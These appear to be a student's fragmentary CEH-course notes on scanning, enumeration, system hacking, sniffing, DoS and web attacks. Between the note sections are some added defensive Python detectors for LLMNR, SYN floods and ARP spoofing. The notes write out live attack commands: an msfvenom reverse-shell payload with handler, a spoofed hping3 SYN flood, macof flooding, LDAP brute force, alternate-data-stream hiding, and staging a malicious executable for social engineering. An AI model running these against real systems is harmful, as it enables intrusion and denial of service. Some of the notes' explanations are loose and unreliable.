
ONE DRIVE LINK:-

https://onedrive.live.com/?authkey=%21AFCcVeaoihlIptE&id=A06B0807E9CEFDF8%21406&cid=A06B0807E9CEFDF8

3. SCANNING NETWORKS
1) Ports and services are what we need and use to access a host.
2) By scanning ports and services we get to know the vulnerabilities.
3) ipconfig to know the IPv4 address.
4) (ip addr) -> newer cmd for the IPv4 address on Linux.
5) The (ping) cmd is also used to communicate b/w devices in the same network.
6) If I don't know the IP addr of the opponent we can use the NMAP cmd (use this cmd to perform host discovery).
7) The 1st IP addr is the network addr (10.10.1.0) and the last IP address (10.10.1.255) is the broadcast addr.
8) If you want to scan a large number of machines in quick time use cmd (nmap -sn 10.10.1.0/24).
9) With the help of TTL (time to live) we can know which IP addrs have a machine and what OS it runs.
10) nmap also helps to know whether the machine is a server or not.
11) A protocol is known as the m/c to m/c communication language.
12) TCP (connection-oriented protocol), UDP (User Datagram Protocol).
13) (nmap -O 10.10.1.11) by this you can know more detailed information about the m/c.
14) -O to know about the OS.
15) nmap -O 10.10.1.11 -> this cmd must be run by the root user.
16) ARP (Address Resolution Protocol) -> used to get the MAC addr.

AFTER 9:00 PM

17) (nmap -A 10.10.1.11) gives a lot of results, but in a very detailed manner.


18) sx is a new way to scan ARP in newer versions of Linux.
19) (net user) is used to know how many users are there on our device.
20) (netstat -on) we can know the active connection ports with many devices.
21) If a connection is established but I want to close it: (taskkill /pid NUMBER).
22) nmap -sV -> scan versions.
23) hping3 is slightly similar to nmap, but hping3 has some superpowers compared to nmap.
24) (nmap --script smb-os-discovery.nse) -> it can give a lot of information at once.

4TH MODULE ENUMERATION

1) nbtstat (NetBIOS statistics); nbtstat -c -> to check connections
1a) With the help of nbtstat we can do NetBIOS enumeration.
1b) -a displays the NetBIOS name table of a remote computer: nbtstat -a [IP address of the remote machine]

2) NSE -> Nmap Scripting Engine

3) The SNMP protocol works on port 161.
4) snmp-check (with this we can check which users are on the attacked OS; by this we can expose the users fully).
5) LDAP -> Lightweight Directory Access Protocol
6) LDAP -> also known as Active Directory Domain Services
7) nmap -p 389 --script ldap-brute --script-args ldap.base='"cn=users,dc=CEH,dc=com"' 10.10.1.22 for username enumeration
8) Now, we will connect to the target LDAP server without credentials using Python:
{ server = ldap3.Server('[Target IP Address]', get_info=ldap3.ALL, port=[Target Port]) } => for Python-based LDAP enumeration

MODULE 05 (vulnerability analysis):-

1) nmap -sV: scanning the version of the target system
2) CVE = Common Vulnerabilities and Exposures
3)

SYSTEM HACKING (m6)

1) Link-Local Multicast Name Resolution (LLMNR):-
is a protocol based on the Domain Name System (DNS) packet format that allows both IPv4 and IPv6 hosts to perform name resolution for hosts on the same local link.
It is included in Windows Vista, Windows Server 2008, Windows 7, Windows 8 and Windows 10.
2) ls -l responder.py to see whether the file has execute permission or not
3) chmod +x responder.py to give execute permission
4) $john new.txt -> hash cracker
5) $service apache2 status -> for checking the Apache HTTP server
6) web server:
7) $service apache2 start -> to start the server
8) $msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=10.10.1.13 LPORT=4444 -o ghost.exe -> it is used to create the payload
9) $msfconsole -> it is used to work with all the features of Metasploit
10) $msfconsole creates a backdoor and controls the victim machine
11) -p = payload
12) reverse_tcp = it is like a backdoor which bypasses the firewall
13) $run vnc = to run the victim system remotely
14) SAM = Security Account Manager
15) type calc.exe > sample.txt:calc.exe = it is used to hide the calc file inside sample.txt
16) mklink super.exe sample.txt:calc.exe = by clicking the super file we directly access the calc file
17) $msfconsole
17.a) msf6> use exploit/multi/handler
17.b) msf exploit(multi/handler)> set payload windows/meterpreter/reverse_tcp
17.c) exploit(multi/handler)> show options = to see what options are there in this payload.
17.d) exploit(multi/handler)> exploit = to start the reverse TCP handler on LHOST:LPORT (means to put the payload into action)
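An added example (not from the notes or from Responder) for item 1 above: it builds and decodes an LLMNR message using the DNS wire format the note describes, and shows the defender-side check, since an LLMNR query on a managed network means a host still has the protocol enabled and an answer from the wrong host is the trace poisoning leaves. The port constant is the real LLMNR port; the inputs, host addresses and `known_hosts` table are constructed.

```python
import struct

LLMNR_PORT = 5355   # LLMNR queries go to UDP 5355 on multicast 224.0.0.252


def build_llmnr_query(name, txid=0x1234, qtype=1):
    """Constructed LLMNR query in the DNS wire format the note describes:
    12-byte header (ID, flags, QD/AN/NS/ARCOUNT), then one question."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    qname = b"".join(bytes([len(p)]) + p.encode("ascii")
                     for p in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", qtype, 1)   # QCLASS 1 = IN


def parse_llmnr(packet):
    """Decode the header and the question of an LLMNR (or DNS) message."""
    if len(packet) < 12:
        raise ValueError("truncated header")
    txid, flags, _qd, ancount, _ns, _ar = struct.unpack("!HHHHHH", packet[:12])
    off, labels = 12, []
    while True:
        if off >= len(packet):
            raise ValueError("truncated name")
        length, off = packet[off], off + 1
        if length == 0:
            break
        if length & 0xC0:   # DNS compression pointer; never valid in a question
            raise ValueError("compression pointer in question name")
        labels.append(packet[off:off + length].decode("ascii", "replace"))
        off += length
    if off + 4 > len(packet):
        raise ValueError("truncated question")
    qtype, qclass = struct.unpack("!HH", packet[off:off + 4])
    return {"id": txid, "is_response": bool(flags & 0x8000), "answers": ancount,
            "name": ".".join(labels), "qtype": qtype, "qclass": qclass}


def audit_llmnr(src_ip, src_port, dst_port, payload, known_hosts):
    """Triage one captured UDP datagram (constructed inputs): a query means
    LLMNR is still enabled on that host; an answer from an address other than
    the one the name really belongs to is the pattern poisoning produces."""
    if LLMNR_PORT not in (src_port, dst_port):
        return None
    msg = parse_llmnr(payload)
    if not msg["is_response"]:
        return f"query for '{msg['name']}' from {src_ip}: LLMNR still enabled"
    if known_hosts.get(msg["name"].lower()) != src_ip:
        return f"answer for '{msg['name']}' from unexpected host {src_ip}"
    return None
```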
$$$SPECIAL$$$
-----------------------------------------------------------------------------------
@) In the previous lab, we already created a directory or shared folder (share) at the location (/var/www/html) with the required access permissions. So, we will use the same directory or shared folder (share) to share malicious_payload.exe with the victim machine.

Note: If you want to create a new directory to share the malicious_payload.exe file with the target machine and provide the permissions, use the commands below:

Type mkdir /var/www/html/share and press Enter to create a shared folder
Type chmod -R 755 /var/www/html/share and press Enter
Type chown -R www-data:www-data /var/www/html/share and press Enter
In the Terminal window, type cp /root/Desktop/malicious_payload.exe /var/www/html/share/ and press Enter to copy the file to the shared folder. [FOR SOCIAL ENGINEERING OF MALWARE]
-----------------------------------------------------------------------------------
7. MALWARE THREATS
1) static malware analysis
2) dynamic malware analysis
3) njRAT = to build a trojan on Windows
4) njRAT = we can access the victim's computer
5) SIEM tools are used by MNCs
6) Splunk

8. SNIFFING
1) IP spoofing using ARP (Address Resolution Protocol).
2) A switch majorly works on MAC addresses.
3) A switch has a FIFO method.
4) macof helps in a MAC flooding attack.
5) macof -i eth0 -n 10
6)

9. SOCIAL ENGINEERING
1) The art of convincing people to expose their own information.
2) $setoolkit = Social Engineering Toolkit
2.1) It helps to create phishing websites.
3) PhishTank = it is a phishing awareness website.
4) netstat extension = it is like an antivirus

10. DOS ATTACK

1) In this type of attack the authentic user can't access the website because of a fake packet flood attack.
2) DDoS attack: it uses a botnet for the same flood attack, sending a huge amount of fake packets to the target server.
3) $ping 10.10.1.11 = to check the flood attack occurrence on the target system
4) $nmap -p 21 10.10.1.11 = to check whether the target system's port is open or not
5) msf6> use auxiliary/dos/tcp/synflood = auxiliary (scanning) module for implementing a DoS attack
6) hping3 -S (SYN request) 10.10.1.11 -a (spoofed IP) 10.10.1.22 -p (attacked port) 22 --flood
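An added example (not from the notes) for the detection side of items 5 and 6: a sliding-window counter over flow records that flags a target receiving far more bare SYNs than a host could legitimately open, which is what a synflood module or `hping3 -S ... --flood` with a spoofed source produces. The records, addresses, window and threshold are constructed assumptions.

```python
from collections import defaultdict, deque


def build_sample_records():
    """Constructed flow records (ts, src, dst, dport, tcp_flags), not real traffic:
    one normal SSH handshake, then 300 bare SYNs in 1.5 s from one (spoofed)
    source address against port 22."""
    recs = [(0.00, "10.10.1.13", "10.10.1.11", 22, "S"),
            (0.01, "10.10.1.11", "10.10.1.13", 51514, "SA"),
            (0.02, "10.10.1.13", "10.10.1.11", 22, "A")]
    recs += [(1.0 + i / 200, "10.10.1.22", "10.10.1.11", 22, "S") for i in range(300)]
    return recs


def detect_syn_flood(records, window=1.0, threshold=100):
    """Sliding-window SYN counter per (dst_ip, dst_port). A bare SYN (no ACK)
    is a half-open connection attempt; more than `threshold` of them inside
    `window` seconds against one target is reported once. Both limits are
    assumptions to tune per environment."""
    recent = defaultdict(deque)      # target -> timestamps of recent SYNs
    sources = defaultdict(set)       # target -> every source that sent a SYN
    alerts = {}
    for ts, src, dst, dport, flags in sorted(records):
        if "S" not in flags or "A" in flags:
            continue                 # keep only SYNs, drop SYN/ACK replies
        key = (dst, dport)
        q = recent[key]
        q.append(ts)
        sources[key].add(src)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) > threshold and key not in alerts:
            alerts[key] = {"first_seen": ts, "syns_in_window": len(q),
                           "distinct_sources": len(sources[key])}
    return alerts
```

On Linux targets the standard host-side mitigation for this pattern is SYN cookies (net.ipv4.tcp_syncookies=1), which stops half-open connections from consuming the backlog.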

11. SESSION HIJACKING
1) Once the user and the server are connected, that is called a session.
2) Session hijacking = the attacker interferes b/w the user and the server, then the attacker communicates with the server in the name of the genuine user.
3) Two types of session hijacking (active & passive)
3.1) In active, the attacker seizes control of the session.
3.2) In passive, the attacker is like a movie-watching audience.
4) ZAP (Zed Attack Proxy), the same as Burp Suite.
5) For passive:
$bettercap -iface (interface) eth0
6) With Wireshark we can detect session hijacking.
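An added example (not from the notes) covering both section 8 (ARP spoofing, macof MAC flooding) and item 6 above: the two checks a capture-based detector runs on the link layer, an IP whose claimed MAC changes in ARP replies, and a burst of distinct source MACs far larger than the segment's host count. The ARP replies, frames, MACs and thresholds are constructed.

```python
from collections import Counter, deque


def arp_spoof_alerts(arp_replies, trusted=None):
    """Learn which MAC each IP claims from ARP replies (ts, sender_ip, sender_mac)
    and report every reply that contradicts what was learned. `trusted` seeds
    the table, e.g. the gateway's real MAC from the switch or DHCP records."""
    table = dict(trusted or {})
    alerts = []
    for ts, ip, mac in arp_replies:
        known = table.setdefault(ip, mac)     # first claim wins; never overwritten
        if known != mac:
            alerts.append((ts, ip, known, mac))
    return alerts


def mac_flood_first_alert(frames, window=1.0, max_macs=100):
    """Count distinct source MACs seen within `window` seconds of frames
    (ts, src_mac). A switch learns one entry per source MAC, so far more
    distinct MACs than hosts on the segment means the CAM table is being filled.
    Returns (ts, distinct_macs) for the first breach, else None."""
    recent, live = deque(), Counter()
    for ts, mac in sorted(frames):
        recent.append((ts, mac))
        live[mac] += 1
        while recent and ts - recent[0][0] > window:
            _, old = recent.popleft()
            live[old] -= 1
            if live[old] == 0:
                del live[old]
        if len(live) > max_macs:
            return ts, len(live)
    return None


def build_samples():
    """Constructed records, not a real capture. The ARP stream shows the
    gateway 10.10.1.1 suddenly claimed by a second MAC (what ARP spoofing
    looks like on the wire); the frame stream is a macof-style burst."""
    arp = [(0.0, "10.10.1.1", "00:50:56:00:00:01"),
           (0.5, "10.10.1.11", "00:50:56:00:00:11"),
           (5.0, "10.10.1.1", "00:0c:29:aa:bb:cc"),
           (5.1, "10.10.1.1", "00:0c:29:aa:bb:cc")]
    frames = [(i / 1000, f"02:00:00:00:{i >> 8:02x}:{i & 0xff:02x}")
              for i in range(300)]
    return arp, frames
```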

12. EVADING IDS, FIREWALLS AND HONEYPOTS

1) IDS = it is a software system or hardware device that inspects inbound and outbound network traffic.
2) IDS and IPS can't block a particular IP, but a firewall can do it.
3) The Snort tool is open-source software for a network intrusion prevention system.
4) In Snort we edit the rules as per our need.
5) ZoneAlarm Free Firewall
5.1) It is a software firewall to monitor our network personally.
5.2) We can block any IP individually.
6) HoneyBOT:
6.1) Monitors the network, collecting the network packets.

13. WEB SERVER
1) A web server is a computer system which is used to store, process and connect to the internet through HTTP.
2) who.is = it is used to search for domains or IP addresses.
3) ghost_eye is a Python tool for everything related to web servers.
4) skipfish: it brute-force attacks the whole website.
5) hydra is a tool which is a parallelized login cracker supporting numerous protocols to attack.
6) $hydra -h
7)

14. HACKING WEB APPLICATIONS

1) A web app is the interface between the end user and web servers.
2) $whatweb www.ethicalhacker.com = this tool can identify and recognize all the web technologies available on the target website.
3) Load balancing ($lbd www.certifiedhacker.com) = checking for HTTP load balancing.

15)
16)

17. HACKING MOBILE PLATFORMS

1) One of the vulnerabilities for mobile hacking is a fake mobile tower, meaning spoofing the mobile network so that mobile devices connect to it.
2)

18)
19)
20)
